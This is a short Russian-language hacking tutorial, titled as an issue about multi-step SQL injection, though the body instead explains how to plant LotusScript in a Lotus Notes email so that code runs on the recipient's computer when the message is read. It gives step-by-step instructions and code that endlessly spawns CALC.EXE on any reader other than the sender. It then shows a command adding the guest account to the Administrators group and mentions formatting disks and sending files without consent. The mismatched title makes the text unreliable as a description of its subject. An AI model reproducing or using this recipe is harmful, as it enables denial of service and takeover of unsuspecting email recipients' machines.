Xakep #305. Многошаговые SQL-инъекции
С небольшим LotusScript в вашей почте, вы можете выполнять любые команды на компьютере получателя:
Пример:
1) Создайте новое письмо, добавьте получателя
2) В теле письма кликните в меню "Create..Object"
3) Выберите "Control" и любой объект типа "ActiveXPlugin
Object".
4) В Client 4.6 правым кликом на объекте выберите "Properties". В Client 5 кликните в меню свойство new
"Applet", выберите "Properties".
5) Затем выберите "Edit events".
6) В разделе "Initialize" добавьте следующий код, где "My EMAIL" - ваше учетное имя в Lotus Notes
Sub Initialize
Dim TaskId As Integer
Dim session As New NotesSession
If session.CommonUserName<>"My EMAIL" Then
Do
TaskId%=Shell("CALC.EXE",1)
Loop
End If
End Subv
7) В разделе "Terminate" выполните следующее:
Sub Terminate
Dim TaskId As Integer
Dim session As New NotesSession
If session.CommonUserName<>"My EMAIL" Then
Do
TaskId%=Shell("CALC.EXE",1)
Loop
End If
End Subv
8) Нажмите снова на раздел "Initialize"
9) Пошлите письмо.
Ваш ActiveX (или другой объект выбранный вами) выполняется во время чтения документа. В этом примере мы выполняем калькулятор в цикле, но можно делать все что угодно - форматировать жесткий диск, посылать файлы без согласия владельца и .т.п.
Например, вы можете заменить, Do .. Loop:
TaskId%=Shell("CMD.EXE /C net localgroup " \"Administrators"\" /add guest ",1)
который добавит учетную запись guest в группу администратора.